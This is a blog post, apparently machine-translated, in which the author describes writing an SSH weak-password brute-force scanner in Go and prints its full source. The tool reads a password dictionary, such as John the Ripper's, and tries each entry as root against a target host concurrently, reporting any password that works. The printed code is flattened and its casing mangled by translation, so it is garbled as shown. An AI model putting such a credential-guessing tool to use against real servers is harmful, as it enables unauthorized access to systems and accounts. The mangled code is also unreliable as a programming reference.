SSH weak password scan (Golang version)

This is a creation in Article, where the information may have evolved or changed.

0x00

Try to penetrate the process, the initiation of a little oneself also write a little code, do not use other people's tools of the idea. So when I had a whim to ssh weak password scan, do not hesitate to get started directly.

0x01

Scanning this kind of thing, single thread is an insult to your computer's performance. I got started by excluding the two multi-threaded languages that are not easy to write and choose Python directly. It was a smooth start, and when it really started, I found a serious problem: why CTRL-C? Checked A, balabala a lot of, in short, the Python thread runs when the main thread is blocked, so Sigint is also blocked, the thread can not receive the signal without hesitation has been running down.

There is no solution, but I think this setting is too silly and anti-human. My train of thought turned to a Menyuan. Support for concurrent C-System languages: Go

0x10

I have to say that since I'm not very familiar with go, I have encountered quite a lot of trouble in the process of completing this short dozens of lines of code.

The first is the use of the SSH packet go: Godoc inside do not know why all the code did not add the package name, I was not aware of the brain is a problem here, incredibly did not bring the package name so to write. So compile at the same time that the SSH package does not work, on the one hand, dial and other identifiers are undefined ... But this is only a momentary loss.

The second error is ugly, and when you write Python concurrency, the child threads do not end with the main thread. It's not the same thing as going to go. I didn't think of the problem, but the solution was stupid ... I used an infinite for loop in vain to reach the blocking effect. It turns out that this is impossible.

Third, it's not a mistake. When I write Python, I do it through a lock, and the performance of Go is elegant and high-end. The channel also plays a role in communication and blocking between the processes, and the simple code completes this function.

Four, I was troubled by the output end prompt after all goroutine ran. At first I output when the Readpassword function returns, but when it returns, there are actually some goroutine that do not run out, so they will output some extra, especially ugly. Then I found the sync primitives in the Sync pack and solved the problem.

Package Mainimport "code.google.com/p/go.crypto/ssh" import "FMT" import "Bufio" import "OS" Import "Strings" Import "Sync "var channal = Make (Chan string) var w sync. Waitgroupfunc Readpassword (PF *bufio. Reader) {for{Password,err: = PF.            ReadString (' \ n ') if Err!=nil {close (channal)//print ("Scan Finished,result not found\n") return} Password = strings.        TrimRight (password, "\ n") channal <-password}}func ssh_login (hostname string, username string) {for{ password,more:= <-channal if!more{w.done () return} config: = &ssh . clientconfig{User:username, Auth: []ssh. authmethod{ssh. Password (Password),},} _, Err: = ssh. Dial ("TCP", hostname, config) if err! = Nil {fmt. Printf ("\033[33m[-]testing passowrd%s\tresult:wrong\n\033[0m", password)} else{fmt. Printf ("\033[32m[-]found Password%s for root\n\033[0m ", password) return}}}func main () {if Len (OS. Args) <2 {fmt. Printf ("[-]usage%s [hostname:port]\n], OS. ARGS[0]) os. Exit (1)} hostname: = OS. ARGS[1] Pf,err: = OS. Open ("Password.lst") if Err!=nil {fmt. Println ("[-]dictionary needed") OS. Exit (1)} BF: = Bufio. Newreader (PF) Defer PF. Close () go Readpassword (BF) FMT.    Println ("Scanning start!") For i:=1;i<20;i++ {w.add (1) Go Ssh_login (hostname, "root")} w.wait () print ("Scan finished,r Esult not found\n ")//var input string//fmt. Scanln (&input)}

there is no high level of familiarity with go, so there is definitely a lot of code that can be optimized. However, the basic ability to scan weak passwords has been completed.

PS1. Need to use a weak password dictionary, I'm using a dictionary from John the Ripper.

PS2.SSH package needs to be installed on its own, go get + package name

PS3. The "\033[33m" in the string is used for color matching on the terminal to achieve the wrong result yellow output, the correct result of the green output.